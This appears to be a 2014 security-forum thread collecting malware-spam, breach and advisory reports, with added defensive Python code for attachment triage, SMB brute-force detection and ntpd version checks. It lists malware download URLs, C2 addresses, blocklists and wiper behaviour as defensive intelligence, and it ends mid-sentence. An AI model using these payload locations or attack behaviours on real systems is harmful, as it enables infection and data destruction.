Dec 16 2014 - "At 20:00 CT on December 14, an Internet intruder gained access to one of the Ars Web servers and spent the next hour attempting to get from the Web server to a more central machine. At 20:52, the attempt was successful thanks to information gleaned from a poorly located backup file. The next day, at 14:13, the hacker returned to the central server and replaced the main Ars webpage with a defacement page that streamed a song from the band Dual Core... "All the Things"... by 14:29, our technical team had removed the defaced page and restored normal Ars operations. We spent the afternoon changing all internal passwords and certificates and hardening server security even further. Log files show the hacker's movements through our servers and suggest that he or she had the opportunity to copy the user database. This database contains no payment information on Ars subscribers, but it does contain user e-mail addresses and passwords. Those passwords, however, are stored in hashed form (using 2,048 iterations of the MD5 algorithm and salted with a random series of characters). Out of an excess of caution, we strongly encourage all Ars readers - especially any who have reused their Ars passwords on other, more sensitive sites - to change their passwords today. We are continuing with a full autopsy of the hack and will provide updates if anything new comes to light..."

:fear::fear: :mad:
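
A triage check for the two disguises that recur in the posts above: an .exe named like a document (fax8642174_pdf.exe, message_zdm.exe inside a zip) and a Word 2007 zip container shipped under a .doc name with a macro inside (ACH transaction 3360.doc, ACH transfer 1336.doc). This is an added example, not code from dynamoo, myonlinesecurity or any other quoted source; it judges files by their magic bytes and by the members of the zip container rather than by the name the sender chose. The sample bytes are constructed in memory (a bare "MZ" header standing in for a real executable), so nothing here fetches or opens the real samples, and the spoofed-icon trick itself is not checked (that would need PE resource parsing); the name/content mismatch is.

```python
"""Attachment triage: extension versus real content.

Added example for the thread above, not from any of the quoted blogs.
All sample attachments below are constructed stand-ins, not real malware.
"""
import io
import re
import zipfile

DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt", ".htm", ".html"}
LEGACY_OFFICE_EXTS = {".doc", ".xls", ".ppt"}        # pre-2007 OLE2 formats
# A document hint buried in the stem, e.g. "fax8642174_pdf.exe" or "invoice.pdf.exe".
DOC_HINT = re.compile(r"[_\-.](pdf|docx?|xlsx?|txt)(?=\.)")


def classify_bytes(data: bytes) -> str:
    """Identify the container by its magic bytes, ignoring the file name."""
    if data[:2] == b"MZ":
        return "pe"                                    # Windows executable
    if data[:4] == b"%PDF":
        return "pdf"
    if data[:8] == bytes.fromhex("D0CF11E0A1B11AE1"):
        return "ole2"                                  # legacy .doc/.xls container
    if data[:4] == b"PK\x03\x04":
        return "zip"                                   # plain zip or OOXML (.docx/.xlsx)
    return "unknown"


def triage(name: str, data: bytes, depth: int = 0) -> list:
    """Return a list of human-readable findings for one attachment.

    Recurses one level into plain zip archives so that a zipped .exe is judged
    by its own name and content, as in the fax/secure-message spam runs.
    """
    findings = []
    lower = name.lower()
    ext = ("." + lower.rsplit(".", 1)[1]) if "." in lower else ""
    kind = classify_bytes(data)

    if kind == "pe":
        if ext in DOCUMENT_EXTS or DOC_HINT.search(lower):
            findings.append(f"{name}: PE executable disguised as a document")
        else:
            where = " (inside an archive)" if depth else ""
            findings.append(f"{name}: executable attachment{where}")
        return findings

    if kind == "zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = z.namelist()
                if "[Content_Types].xml" in names:      # OOXML, not a plain archive
                    if ext in LEGACY_OFFICE_EXTS:
                        findings.append(
                            f"{name}: Office 2007+ (OOXML) content under a legacy {ext} extension")
                    if any(n.lower().endswith("vbaproject.bin") for n in names):
                        findings.append(f"{name}: Office document carries a VBA macro project")
                elif depth == 0:
                    for member in names:
                        findings.extend(triage(member, z.read(member), depth + 1))
        except zipfile.BadZipFile:
            findings.append(f"{name}: claims to be a zip but cannot be parsed")
    return findings


def make_zip(members: dict) -> bytes:
    """Build an in-memory zip; used only to construct the samples below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for member_name, member_data in members.items():
            z.writestr(member_name, member_data)
    return buf.getvalue()


# Constructed samples: only the DOS "MZ" magic, never a runnable binary.
FAKE_PE = b"MZ" + b"\x00" * 62
SAMPLE_FAX_ZIP = make_zip({"fax8642174_pdf.exe": FAKE_PE})
SAMPLE_SECURE_MSG = make_zip({"message_zdm.exe": FAKE_PE})
SAMPLE_ACH_DOC = make_zip({
    "[Content_Types].xml": b"<Types/>",
    "word/document.xml": b"<w:document/>",
    "word/vbaProject.bin": b"\x00" * 16,               # stand-in for a real VBA project
})
SAMPLE_CLEAN_DOCX = make_zip({
    "[Content_Types].xml": b"<Types/>",
    "word/document.xml": b"<w:document/>",
})

if __name__ == "__main__":
    for attachment_name, blob in [
        ("fax8642174_pdf.zip", SAMPLE_FAX_ZIP),
        ("message_zdm.zip", SAMPLE_SECURE_MSG),
        ("ACH transaction 3360.doc", SAMPLE_ACH_DOC),
        ("report.docx", SAMPLE_CLEAN_DOCX),
    ]:
        for line in triage(attachment_name, blob) or [f"{attachment_name}: no findings"]:
            print(line)
```

A gateway would run triage() over every MIME part; anything with a finding gets quarantined rather than delivered, regardless of the VirusTotal score of the day (the posts above show 0/53 and 1/55 detections for fresh samples, so name/content mismatch and a VBA project in an invoice are better triggers than AV verdicts).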

AplusWebMaster
2014-12-21, 14:59
FYI...

Targeted Destructive Malware - Alert (TA14-353A)
- https://www.us-cert.gov/ncas/alerts/TA14-353A
Last revised: Dec 20, 2014 - "Systems Affected: Microsoft Windows
Overview: US-CERT was recently notified by a trusted third party of cyber threat actors using a Server Message Block (SMB) Worm Tool to conduct cyber exploitation activities recently targeting a major entertainment company. This SMB Worm Tool is equipped with a Listening Implant, Lightweight Backdoor, Proxy Tool, Destructive Hard Drive Tool, and Destructive Target Cleaning Tool.
SMB Worm Tool: This worm uses a brute force authentication attack to propagate via Windows SMB shares. It connects home every five minutes to send log data back to command and control (C2) infrastructure if it has successfully spread to other Windows hosts via SMB port 445. The tool also accepts new scan tasking when it connects to C2*. There are two main threads: the first thread calls home and sends back logs (a list of successful SMB exploitations), and the second thread attempts to guess passwords for SMB connections. If the password is correctly guessed, a file share is established and file is copied and run on the newly-infected host...
Destructive Hard Drive Tool: This tool is a tailored hard-drive wiping tool that is intended to destroy data past the point of recovery and to complicate the victim machine’s recovery. If the CNE operator has administrator-level privileges on the host, the program will over-write portions of up to the first four physical drives attached, and over-write the master boot record (MBR) with a program designed to cause further damage if the hard drive is re-booted. This further results in the victim machine being non-operational with irrecoverable data (There is a caveat for machines installed with the Windows 7 operating system: Windows 7 machines will continue to operate in a degraded state with the targeted files destroyed until after reboot, in which the infected MBR then wipes the drive.) If the actor has user-level access, the result includes specific files being deleted and practically irrecoverable, but the victim machine would remain usable.
Destructive Target Cleaning Tool: This tool renders victim machines inoperable by overwriting the Master Boot Record. The tool is dropped and installed by another executable and consists of three parts: an executable and a dll which contain the destructive components, and an encoded command file that contains the actual destruction commands to be executed.
... *summary of the C2 IP addresses:
203.131.222.102 Thailand...
217.96.33.164 Poland...
88.53.215.64 Italy...
200.87.126.116 Bolivia...
58.185.154.99 Singapore...
212.31.102.100 Cyprus...
208.105.226.235 United States..."
(More detail at the us-cert URL above.)

203.131.222.102: https://www.virustotal.com/en/ip-address/203.131.222.102/information/
217.96.33.164: https://www.virustotal.com/en/ip-address/217.96.33.164/information/
88.53.215.64: https://www.virustotal.com/en/ip-address/88.53.215.64/information/
200.87.126.116: https://www.virustotal.com/en/ip-address/200.87.126.116/information/
58.185.154.99: https://www.virustotal.com/en/ip-address/58.185.154.99/information/
212.31.102.100: https://www.virustotal.com/en/ip-address/212.31.102.100/information/
208.105.226.235: https://www.virustotal.com/en/ip-address/208.105.226.235/information/

- http://arstechnica.com/security/2014/12/malware-believed-to-hit-sony-studio-contained-a-cocktail-of-badness/
Dec 19 2014
> http://cdn.arstechnica.net/wp-content/uploads/2014/12/c2-ip-addresses.png
___

Fake FedEx SPAM – malware
- http://myonlinesecurity.co.uk/fedex-postal-notification-service-malware/
20 Dec 2014 - "'Postal Notification Service' pretending to come from FedEx with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Fedex-Postal-Notification-Service.jpg

20 December 2014 : notification.zip: Extracts to: notification_48957348759483759834759834758934798537498.exe
Current Virus total detections: 1/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an unknown file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/777771b8483ce8a8503ed4cdd86d425c3088c17fa7794512913751d48421a860/analysis/1419076775/

"Package Delivery" Themed Scam Alert
- https://www.us-cert.gov/ncas/current-activity/2014/12/19/FTC-Releases-Package-Delivery-Themed-Scam-Alert
Dec 19, 2014
> http://www.consumer.ftc.gov/blog/package-delivery-scam-delivered-your-inbox

:fear: :mad:
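
The SMB Worm Tool in TA14-353A spreads by guessing passwords over port 445, and that leaves a trail on the targets: bursts of failed network logons (Security event 4625, logon type 3) from one source against several hosts and accounts, followed by a success (4624) once a password is guessed. This is an added detection example, not anything from the US-CERT alert. It reads a constructed, simplified CSV export of those events (the column names, the thresholds and the 10.0.0.x addresses are assumptions for the illustration; a real pipeline would feed it from Windows Event Forwarding or a SIEM export) and reports each source whose failures within a five-minute window exceed the thresholds.

```python
"""Detect SMB password guessing from Windows logon events.

Added example for the TA14-353A post above; not from the alert itself.
SAMPLE_EVENTS is a constructed, simplified export: 4625 = failed logon,
4624 = successful logon, logon type 3 = network (what SMB authentication produces).
"""
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = """\
time,event_id,logon_type,target_host,source_ip,account
2014-12-19T10:00:01Z,4625,3,FILESRV01,10.0.0.25,administrator
2014-12-19T10:00:03Z,4625,3,FILESRV01,10.0.0.25,backup
2014-12-19T10:00:06Z,4625,3,FILESRV01,10.0.0.25,svc_sql
2014-12-19T10:00:09Z,4625,3,FILESRV02,10.0.0.25,administrator
2014-12-19T10:00:12Z,4625,3,FILESRV02,10.0.0.25,backup
2014-12-19T10:00:15Z,4625,3,FILESRV02,10.0.0.25,svc_sql
2014-12-19T10:00:18Z,4625,3,FILESRV03,10.0.0.25,administrator
2014-12-19T10:00:21Z,4625,3,FILESRV03,10.0.0.25,backup
2014-12-19T10:00:24Z,4625,3,FILESRV04,10.0.0.25,administrator
2014-12-19T10:00:27Z,4625,3,FILESRV04,10.0.0.25,backup
2014-12-19T10:00:31Z,4624,3,FILESRV04,10.0.0.25,svc_sql
2014-12-19T10:05:00Z,4625,3,FILESRV01,10.0.0.40,bob
2014-12-19T10:05:07Z,4625,3,FILESRV01,10.0.0.40,bob
2014-12-19T10:05:15Z,4624,3,FILESRV01,10.0.0.40,bob
"""


def parse_events(text: str) -> list:
    """Parse the CSV export into rows with typed time/event_id/logon_type fields."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["time"] = datetime.strptime(row["time"], "%Y-%m-%dT%H:%M:%SZ")
        row["event_id"] = int(row["event_id"])
        row["logon_type"] = int(row["logon_type"])
        rows.append(row)
    return rows


def detect_smb_guessing(text: str, window: timedelta = timedelta(minutes=5),
                        min_failures: int = 8, min_targets: int = 3) -> dict:
    """Return {source_ip: summary} for sources that look like SMB password guessing.

    A source is reported when its densest burst of network logon failures within
    `window` reaches `min_failures` spread over at least `min_targets` distinct
    (host, account) pairs. A user mistyping a password hits one pair and stays below.
    """
    by_source = defaultdict(list)
    for row in parse_events(text):
        if row["logon_type"] == 3 and row["event_id"] in (4624, 4625):
            by_source[row["source_ip"]].append(row)

    hits = {}
    for source, events in by_source.items():
        events.sort(key=lambda r: r["time"])
        failures = [e for e in events if e["event_id"] == 4625]

        # Sliding window over the sorted failures: find the densest burst.
        best_count, best_start, best_end = 0, 0, 0
        j = 0
        for i in range(len(failures)):
            while failures[i]["time"] - failures[j]["time"] > window:
                j += 1
            if i - j + 1 > best_count:
                best_count, best_start, best_end = i - j + 1, j, i
        if best_count < min_failures:
            continue

        burst = failures[best_start:best_end + 1]
        targets = {(e["target_host"], e["account"]) for e in burst}
        if len(targets) < min_targets:
            continue

        # A success from the same source after the burst began means a guess landed.
        first_failure = burst[0]["time"]
        succeeded = any(e["event_id"] == 4624 and e["time"] >= first_failure for e in events)
        hits[source] = {
            "failures": best_count,
            "hosts": sorted({e["target_host"] for e in burst}),
            "accounts": sorted({e["account"] for e in burst}),
            "guess_succeeded": succeeded,
        }
    return hits


if __name__ == "__main__":
    for source, summary in detect_smb_guessing(SAMPLE_EVENTS).items():
        print(source, summary)
```

The "guess_succeeded" flag is the one to page on: in the alert's description the worm copies and runs its file on the newly-infected host as soon as a password is correct, so a success following a burst marks the next host to isolate. Thresholds are guesses for the example; tune them against a baseline of your own 4625 volume before trusting the output.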

AplusWebMaster
2014-12-22, 19:41
FYI...

Angler EK on 193.109.69.59
- http://blog.dynamoo.com/2014/12/angler-ek-on-1931096959.html
22 Dec 2014 - "193.109.69.59 (Mir Telematiki Ltd, Russia) is hosting what appears to be the Angler Exploit Kit... infection chain... The last step is where the badness happens, hosted on 193.109.69.59 (Mir Telematiki Ltd, Russia) which is also being used to host the following malicious domains:
qwe.holidayspeedsix .biz
qwe.holidayspeedfive .biz
qwe.holidayspeedseven .biz
A quick look at the contents of 193.109.68.0/23 shows some other questionable sites. A look at the sites hosted* in this /23 indicates that most of them appear to be selling counterfeit goods, so -blocking- the entire /23 will probably be no great loss.
Recommended -minimum- blocklist:
193.109.69.59
holidayspeedsix .biz
holidayspeedfive .biz
holidayspeedseven .biz "
* http://www.dynamoo.com/files/mmuskatov.csv

193.109.69.59: https://www.virustotal.com/en/ip-address/193.109.69.59/information/
___

Fake 'Tiket alert' SPAM
- http://blog.dynamoo.com/2014/12/tiket-alert-spam-tiket-really.html
22 Dec 2014 - "Sometimes the spammers don't really try very hard. Like they have to make a quota or something. A "Tiket alert" from the FBI.. or is it FBR? Really?

From: FBR service [jon.wo@ fbi .com]
Date: 22 December 2014 at 18:29
Subject: Tiket alert
Look at the link file for more information.
http <redacted>
Assistant Vice President, FBR service
Management Corporation

I have seen another version of this where the download location is negociomega .com/ticket/fsb.html. Clicking on the link downloads a file ticket8724_pdf.zip which in turn contains a malicious executable ticket8724_pdf.exe. This has a VirusTotal detection rate of 2/54*. Between that VirusTotal analysis and the Anubis analysis we can see that the malware attempts to phone home to:
http ://202.153.35.133 :42463/2212us12//0/51-SP3/0/
http ://202.153.35.133 :42463/2212us12//1/0/0/
http ://moorfuse .com/images/unk12.pne
202.153.35.133 is Excell Media Pvt Ltd, India.
Recommended blocklist:
202.153.35.133
moorfuse .com
mitsuba-kenya .com
negociomega .com "
* https://www.virustotal.com/en/file/131855bdd2832705bf8c90f30efd43a22956ca86bab19f3a9941158fd33291af/analysis/1419277515/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
188.132.231.115: https://www.virustotal.com/en/ip-address/188.132.231.115/information/
___

Fake 'Employee Documents' Fax SPAM
- http://blog.mxlab.eu/2014/12/19/email-employee-documents-internal-use-from-no-replaymy-fax-com-leads-to-malicious-zip-file/
Dec 19, 2014 - "... intercepted quite a large distribution campaign by email with the subject “Employee Documents – Internal Use”, this email is sent from the spoofed address “Fax <no-replay@ my-fax .com>” and has the following body:
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: ... <redacted>
Documents are encrypted in transit and store in a secure repository ...

The downloaded file fax8127480_924_pdf.zip contains the 26 kB large file fax8127480_924.exe. The trojan is known as W32/Trojan.HZAT-8029, W32/Trojan3.MYF, Downloader-FSH!FFA9EE754457, Upatre.FH or a variant of Win32/Kryptik.CTMJ... Virus Total*..."
* https://www.virustotal.com/en/file/99b5c743e203cf0fd5be7699124668be35012aaa51233742f2cd979ab43a5dcb/analysis/
File name: fax8127480_924.exe
Detection ratio: 26/53
Analysis date: 2014-12-22
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
174.127.104.112: https://www.virustotal.com/en/ip-address/174.127.104.112/information/
83.166.234.251: https://www.virustotal.com/en/ip-address/83.166.234.251/information/
23.10.252.26: https://www.virustotal.com/en/ip-address/23.10.252.26/information/
50.7.247.42: https://www.virustotal.com/en/ip-address/50.7.247.42/information/
217.172.180.178: https://www.virustotal.com/en/ip-address/217.172.180.178/information/
UDP communications
173.194.71.127: https://www.virustotal.com/en/ip-address/173.194.71.127/information/

:fear::fear: :mad:

AplusWebMaster
2014-12-23, 15:33
FYI...

Fake 'Remittance Advice' SPAM - malicious Excel attachment
- http://blog.dynamoo.com/2014/12/remittance-advice-spam-comes-with.html
23 Dec 2014 - "This -fake- remittance advice comes with a malicious Excel attachment.
From: Whitney
Date: 23 December 2014 at 09:12
Subject: Remittance Advice -DPRC93
Confidentiality and Disclaimer: This email and its attachments are intended for the addressee only and may be confidential or the subject of legal privilege.
If this email and its attachments have come to you in error you must take no action based on them, nor must you copy them, distribute them or show them to anyone.
Please contact the sender to notify them of the error...

The reference in the subject varies, and the name of the attachment always matches (so in this case DPRC93.xls). There are in fact three different versions of the document, all of which have a malicious macro. At the moment, none of these are detected by anti-virus vendors [1] [2] [3]... the macro has now changed completely, as it now loads some of the data from the Excel spreadsheet itself and puts it into a file %TEMP%\windows.vbs. So far I have seen three different scripts... which download a component from one of the following locations:
http ://185.48.56.133:8080/sstat/lldvs.php
http ://95.163.121.27:8080/sstat/lldvs.php
http ://92.63.88.100:8080/sstat/lldvs.php
It appears that this email is downloaded as test.exe and is then saved as %TEMP%\servics.exe. The ThreatExpert report shows traffic to the following:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
80.237.255.196 (Denes Balazs / HostEurope, Germany)
85.25.20.107 (PlusServer AG, Germany)
VirusTotal indicates a detection rate of just 3/54*, and identifies it as Dridex.
Recommended blocklist:
194.146.136.1
80.237.255.196
85.25.20.107
185.48.56.133
95.163.121.27
92.63.88.100
92.63.88.106
Note that there are two IPs acting as downloaders in the 92.63.88.0/24 range (MWTV, Latvia). It may be that you would also want to block that range as well."
1] https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419330172/

2] https://www.virustotal.com/en/file/87bb64f9e759f93b0b47c1c8af917c5a11d66221fe146bbbc26373560c96a0fe/analysis/1419330170/

3] https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419330172/

* https://www.virustotal.com/en/file/a9239d875ecd1dbf4d83e1112c07c49b99b2594262b6a57e0eaa0518390d5ffb/analysis/1419333104/

- http://myonlinesecurity.co.uk/remittance-advice-pzdf16-excel-xls-malware/
23 Dec 2014
> 22 Dec 2014 : PZDF16.xls Current Virus total detections: 0/55*:
TKBJ98.xls Current Virus total detections: 0/55**
* https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419328785/

** https://www.virustotal.com/en/file/e78fb465f9767ae897dd928714f2a329987e765259f5f66275128aa2d44ee6b5/analysis/1419329398/

- http://blog.mxlab.eu/2014/12/23/email-remittance-advice-lcdq26-contains-excel-file-with-malicious-macro/
Dec 23 2014
> https://www.virustotal.com/en/file/e78fb465f9767ae897dd928714f2a329987e765259f5f66275128aa2d44ee6b5/analysis/
___

Fake 'CHRISTMAS OFFERS.docx' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/jayne-route2fitness-co-uk-christmas-offers-docx-word-doc-malware/
23 Dec 2014 - "'CHRISTMAS OFFERS.docx' pretending to come from Jayne <Jayne@ route2fitness .co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email body is completely -blank- . As per usual there are at least 2 different file sizes of this malware although all are named exactly the same.

22 Dec 2014: CHRISTMAS OFFERS.doc (41 kb) . Current Virus total detections: 0/55* : CHRISTMAS OFFERS.doc (44 kb) . Current Virus total detections: 0/56**
Downloads dridex Trojan from microinvent .com//js/bin.exe which is moved to and run from %temp%1\V2MUY2XWYSFXQ.exe Virus total*** ..."
* https://www.virustotal.com/en/file/0c45d7f517f1086528576c5b696303b792c29244dc0a4421f3720ed84a521b2e/analysis/1419327481/

** https://www.virustotal.com/en/file/211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c/analysis/1419327349/

*** https://www.virustotal.com/en/file/de25222783cdcbe20ca8d8d9a531f150387260e5297f672474141227eeff7773/analysis/1419334606/

- http://blog.mxlab.eu/2014/12/23/empty-email-with-attached-word-file-christmas-offers-docx-contains-malicious-macro/
Dec 23, 2014
> https://www.virustotal.com/en/file/211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c/analysis/
___

Network Time Protocol Vulnerabilities
- https://ics-cert.us-cert.gov//advisories/ICSA-14-353-01
Dec 22, 2014 - "... vulnerabilities could be exploited remotely. Exploits that target these vulnerabilities are publicly available. Products using NTP service prior to NTP-4.2.8 are affected. No specific vendor is specified because this is an open source protocol.
IMPACT: Exploitation of these vulnerabilities could allow an attacker to execute arbitrary code with the privileges of the ntpd process..."

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9295 - 7.5 (HIGH)

- http://arstechnica.com/security/2014/12/attack-code-exploiting-critical-bugs-in-net-time-sync-puts-servers-at-risk/
Dec 19 2014

:fear::fear: :mad:
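Added example, not from any of the posts quoted above: the ICSA-14-353-01 advisory says ntpd releases before NTP-4.2.8 are affected, so the first thing a defender wants is a quick inventory check. This Python snippet parses the version banner that `ntpd --version` prints and compares it against 4.2.8. The banner strings in the test are constructed samples; the `@...` build tag format is what ntpd normally prints but is treated here only as trailing text to ignore.

```python
import re
import subprocess

# ICSA-14-353-01 (quoted above) states ntpd prior to 4.2.8 is affected,
# so this is the minimum fixed release the checker compares against.
MIN_FIXED = (4, 2, 8, 0)

# Matches the leading version token of `ntpd --version` output, e.g.
# "ntpd 4.2.6p5@1.2349-o Fri Apr 13 ..." (the "pN" patch level is optional).
_VERSION_RE = re.compile(r"ntpd\s+(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_ntpd_version(banner):
    """Return (major, minor, patch, p_level) from an ntpd version banner,
    or None if the text does not look like ntpd output."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_vulnerable_release(banner):
    """True when the banner's version is older than 4.2.8.

    Caveat: distributions backport fixes without bumping the upstream
    version, so True means 'check the vendor advisory for this build',
    not 'confirmed vulnerable'."""
    ver = parse_ntpd_version(banner)
    if ver is None:
        raise ValueError("unrecognised ntpd version banner: %r" % banner)
    return ver < MIN_FIXED


def local_ntpd_banner():
    """Run `ntpd --version` on this host; returns None if ntpd is absent.
    Some builds print the banner on stderr, so both streams are read."""
    try:
        out = subprocess.run(["ntpd", "--version"], capture_output=True,
                             text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return (out.stdout + out.stderr).strip() or None


if __name__ == "__main__":
    banner = local_ntpd_banner()
    if banner is None:
        print("ntpd not found on this host")
    else:
        print(banner)
        print("older than 4.2.8:", is_vulnerable_release(banner))
```

Run it on each time server; a True result is a prompt to read the distribution's advisory for that package build, since patched packages often keep the old upstream version number.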

AplusWebMaster
2014-12-24, 10:51
FYI...

MBR Wiper attacks strike Korean Power Plant
- http://blog.trendmicro.com/trendlabs-security-intelligence/mbr-wiper-attacks-strike-korean-power-plant/
Dec 23, 2014 - "In recent weeks, a major Korean electric utility has been affected by destructive malware, which was designed to wipe the master boot records (MBRs) of affected systems. It is believed that this MBR wiper arrived at the target systems in part via a vulnerability in the Hangul Word Processor (HWP), a commonly used application in South Korea. A variety of social engineering lures were used to get would-be victims to open these files. Below is a quick overview of the attack with the infection chain starting from a spearphishing email sent to the employees’ inboxes:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/Infection-chain_MBR-wiper3.png
We detect the malware as TROJ_WHAIM.A*, which is a fairly straightforward MBR wiper. In addition to the MBR, it also overwrites files that are of specific types on the affected system. It installs itself as a service on affected machines to ensure that it will run whenever the system is restarted... it uses file names, service names, and descriptions of actual legitimate Windows services. This ensures that a cursory examination of a system’s services may not find anything malicious, helping this threat -evade- detection... This particular MBR-wiping behavior, while uncommon, has been seen before. We observed these routines in March 2013 when several attacks hit various South Korean government agencies resulting in major disruptions to their operations. The malware involved in this attack overwrote the MBR with a series of the words PRINCPES, HASTATI, or PR!NCPES. The recent attack on Sony Pictures also exhibited a similar MBR-wiping capability. There are also similarities to the previous MBR wiper attacks as well. All three attacks mentioned earlier overwrite the MBR with certain repeated strings... These attacks highlight our findings about the destructive, MBR-wiping malware that appear to have become a part of the arsenal of several threat actors. This is a threat that system administrators will have to deal with, and not all targeted attack countermeasures will be effective. Techniques to mitigate the damage that these attacks cause should be considered as a part of defense-in-depth networks.
Update as of 11:29 P.M. PST, December 23, 2014
Upon further analysis, we confirmed that TROJ_WHAIM.A checks if the current date and time is Dec 10, 2014 11:00 AM or later. If it meets this condition, it sets the registry, HKEY_LOCAL_MACHINE\SOFTWARE\PcaSvcc\finish to 1, thus triggering the MBR infection. Otherwise, it sleeps for a minute and checks the system time again. Aside from the MBR infection capabilities and overwriting certain strings, another similarity of this attack to the March 2013 incident is its ‘time bomb’ routine. A certain action is set in motion once the indicated date/time by the attackers is reached by the infected system."
* http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_whaim.a
"To restore your system's Master Boot Record (MBR)..."

South Korea seeks China's cooperation in probe into cyberattack on nuclear operator
- http://www.reuters.com/article/2014/12/24/us-northkorea-cybersecurity-nuclear-idUSKBN0K20DT20141224
Dec 24, 2014 - "... Connections to South Korean virtual private networks (VPNs) used in the cyberattacks were traced to multiple IP addresses in China's Shenyang city, located in a province which borders North Korea..."

Japan, wary of North Korea, works to secure infrastructure after Sony attack
- http://www.reuters.com/article/2014/12/24/us-northkorea-cyberattack-japan-idUSKBN0K20IX20141224
Dec 24, 2014 - "Japan, fearing it could be a soft target for possible North Korean cyberattacks in the escalating row over the Sony Pictures hack, has begun working to ensure basic infrastructure is safe and to formulate its diplomatic response, officials said... The government's National Information Security Center, working through various ministries, is pressing companies to improve their security from cyberattacks..."

Attack maps: http://map.ipviking.com/
___

Fake 'Signature Invoice' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/malware-spam-rhianna-wellings.html
24 Dec 2014 - "Teckentrup Depot UK is a legitimate UK company, but these emails are -not- from Teckentrup Depot and they contain a malicious attachment. Teckentrup Depot has not been hacked, their database has not been compromised, and they are -not- responsible for this in any way.
From: Rhianna Wellings [Rhianna@ teckentrupdepot .co.uk]
Date: 24 December 2014 at 07:54
Subject: Signature Invoice 44281
Your report is attached in DOC format.
To load the report, you will need the Microsoft® Word® reader...

Attached is a malicious Word document called Signature Invoice.doc which comes in two different versions, both of which are undetected by AV vendors [1] [2]. Each one contains a different macro... which then downloads an additional component from one of these two locations:
http ://Lichtblick-tiere .de/js/bin.exe
http ://sunfung .hk/js/bin.exe
The file is saved into the location %TEMP%\1V2MUY2XWYSFXQ.exe and currently has a VirusTotal detection rate of just 4/56*. The ThreatExpert report shows traffic to the following IPs:
74.208.11.204 (1&1 Internet, US)
81.169.156.5 (Strato AG, Germany)
59.148.196.153 (HKBN, Hong Kong)
According to the Malwr report it also drops a malicious DLL with a detection rate of 24/56**, detected as the Dridex banking trojan.
Recommended blocklist:
74.208.11.204
81.169.156.5
59.148.196.153
lichtblick-tiere .de
sunfung .hk "
1] https://www.virustotal.com/en/file/4d7c6a2e9e5b963470cae32ce12f47a608c9477ec7d4b07861f639d15ff35a38/analysis/1419412603/

2] https://www.virustotal.com/en/file/5dc552dabde0e6bd70ed1765d1a8c7cd394a6fc2c32519f529ae619f73739fd6/analysis/1419412612/

* https://www.virustotal.com/en/file/1f56a9ae1984cc1c9435609c0c63845fe0eebaa025fd24387829d280e7dfafcc/analysis/1419413157/

** https://www.virustotal.com/en/file/f259feff8c187b51dabb766491df61c8f0de1345427b337536c2ee4550ac937d/analysis/1419417434/

- http://myonlinesecurity.co.uk/rhianna-wellings-teckentrupdepot-co-uk-signature-invoice-44281-word-doc-malware/
24 Dec 2014 : Signature Invoice.doc . Current Virus total detections: 0/56*: 0/56**
* https://www.virustotal.com/en/file/4d7c6a2e9e5b963470cae32ce12f47a608c9477ec7d4b07861f639d15ff35a38/analysis/1419409093/

** https://www.virustotal.com/en/file/5dc552dabde0e6bd70ed1765d1a8c7cd394a6fc2c32519f529ae619f73739fd6/analysis/1419409548/
___

Fake Christmas offers infect PCs with banking Trojan
- https://blog.malwarebytes.org/fraud-scam/2014/12/santas-fake-christmas-offers-infect-pcs-with-banking-trojan/
Dec 24, 2014 - "... The email is accompanied by a Word document with a catchy name: CHRISTMAS OFFERS.docx:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/xmas_message.png
... the document is blank and requires the user to enable macros in order to view it. By default Microsoft Office disables macros, a handy automation feature but also a huge security risk. This is where the social engineering lies and the crooks are counting on people so eager to see the promised content that they will push the button and get infected. Macros enable you to create scripts that automate repetitive tasks within a document, for example copying content from one page and pasting it with a different font and color on another. At the same time, a macro can be used to perform a malicious action, which happens to be the case here.
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/word_doc.png
... What happens if you were to trust the document? A remote file is downloaded from
